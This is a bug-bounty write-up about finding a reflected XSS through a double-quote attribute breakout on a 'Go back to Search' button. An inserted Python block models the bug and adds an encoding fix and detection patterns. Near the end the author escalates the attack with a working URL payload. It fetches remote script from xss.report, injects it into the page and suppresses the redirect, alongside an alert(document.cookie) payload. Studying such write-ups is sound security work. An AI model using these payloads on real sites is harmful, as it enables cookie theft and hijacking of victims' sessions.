Hello everyone, I will share how I found a reflected XSS in a HackerOne program.
First, I discovered a page with an input field. I attempted a simple XSS payload like this:
<img src onerror=alert(1)>

Initially, this resulted in a self-XSS. I returned to the input field to find a way to make it a reflected XSS. I tried typing random words, but there were no parameters or anything visible in the URL.
Next, I attempted command injection by typing ls. Surprisingly, it navigated to a different page.
This indicated that a parameter was present in the URL. I tested further by inputting <test11>, but the response showed that the < and > characters were not allowed.
Then, I tried using a double quote (") instead. The input was reflected as-is, along with a "Go back to Search" button. At this point, I focused on exploiting event handlers like onclick, onmouseup, and onmouseover.
I crafted this payload:
"onclick="alert(document.cookie)

When I clicked the "Go back to Search" button, the XSS executed successfully. However, after clicking "OK" on the alert, the page redirected to the homepage.
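The root cause described above is a denylist that only rejects angle brackets while the parameter is reflected, unencoded, inside a double-quoted HTML attribute; a single " is then enough to close the attribute and start an on* event handler. The following is an added example, not code from the write-up or the target program: it models that behaviour in a constructed template (the real page's markup is not shown in the post, so the attribute and the data-dttype name are assumptions), shows the context-aware fix (HTML attribute encoding, which neutralises the quote regardless of the denylist), and adds two checks a defender can run: one over rendered markup and one over URL-encoded request URIs as they would appear in access logs.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed stand-in for the behaviour the write-up describes: the app rejects
# '<' and '>' but reflects the dttype parameter, unencoded, inside a double-quoted
# attribute. The template and attribute name are assumptions for illustration.
TEMPLATE = '<a href="/search" data-dttype="{value}">Go back to Search</a>'


def denylist_blocks(value: str) -> bool:
    """The tag-character filter the write-up ran into: angle brackets only."""
    return "<" in value or ">" in value


def render_vulnerable(value: str) -> str:
    """Reflect the parameter protected by the denylist alone (the bug)."""
    if denylist_blocks(value):
        return "<p>Tags are not allowed</p>"
    return TEMPLATE.format(value=value)


def render_fixed(value: str) -> str:
    """Context-aware fix: encode for the HTML attribute context.
    html.escape(quote=True) turns '"' into '&quot;', so the value can never
    close the attribute, whatever the denylist does or does not catch."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


# A quote that closes an attribute followed by an on* event-handler attribute:
# the class of injection the write-up describes.
EVENT_HANDLER_BREAKOUT = re.compile(r'"\s*on[a-z]+\s*=', re.IGNORECASE)


def has_event_handler_breakout(markup: str) -> bool:
    """Check rendered markup (or a captured response body) for the breakout."""
    return EVENT_HANDLER_BREAKOUT.search(markup) is not None


def flag_suspicious_params(url: str) -> list:
    """Decode each query parameter the way the server would and return the
    names of those carrying an attribute-breakout event handler. Intended for
    request URIs from access logs, where the payload arrives URL-encoded."""
    query = urlsplit(url).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if EVENT_HANDLER_BREAKOUT.search(value)]


if __name__ == "__main__":
    probe = '5" onclick="alert(1)'  # the shape of the write-up's payload
    print(render_vulnerable(probe))
    print(has_event_handler_breakout(render_vulnerable(probe)))  # True
    print(render_fixed(probe))
    print(has_event_handler_breakout(render_fixed(probe)))       # False
    # Constructed log-style request URI (placeholder host and parameter values).
    logged = "https://example.invalid/search.cfm?c=PLACEHOLDER&dttype=5%22%20onclick=%22alert(1)"
    print(flag_suspicious_params(logged))  # ['dttype']
```

The point of render_fixed is that output encoding is chosen by the context the value lands in (here an attribute, so quotes must be encoded), not by guessing which characters an attacker needs; a denylist of < and > says nothing about attribute breakouts. The log check decodes before matching, which is why the URL-encoded form from the write-up is still caught.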
To escalate the exploit, I attempted to inject a payload that steals cookies through an https://xss.report/ URL. First I tried this payload.

Encoded version:

https://target.com/cwt.cfm?c=2650F80B&dttype=5%22%20onclick=%22fetch(%27https%3A%2F%2Fxss.report%2Fc%2Fusername%27).then(response%20=%3E%20response.text()).then(text%20=%3E%20{%20var%20script%20=%20document.createElement(%27script%27);%20script.innerHTML%20=%20text;%20document.body.appendChild(script);%20});

Decoded version:

https://target.com/cwtt.cfm?c=2650F80B&dttype=5" onclick="fetch('https://xss.report/c/username').then(response => response.text()).then(text => { var script = document.createElement('script'); script.innerHTML = text; document.body.appendChild(script); });

The problem was that clicking the "Go back to Search" button caused a redirect to the homepage before the XSS could execute. To prevent the redirect, I added return false; to the end of the payload. The final payload looked like this:

https://target.com/cwtt.cfm?c=2650F80B&dttype=5" onclick="fetch('https://xss.report/c/username').then(response => response.text()).then(text => { var script = document.createElement('script'); script.innerHTML = text; document.body.appendChild(script); }); return false;

Now, when the victim clicked the button, the XSS executed without redirecting them.
Extra tip: sometimes you need to URL-encode the xss.report URL for the payload to work properly.
And that is all; I hope you learned something new from this write-up!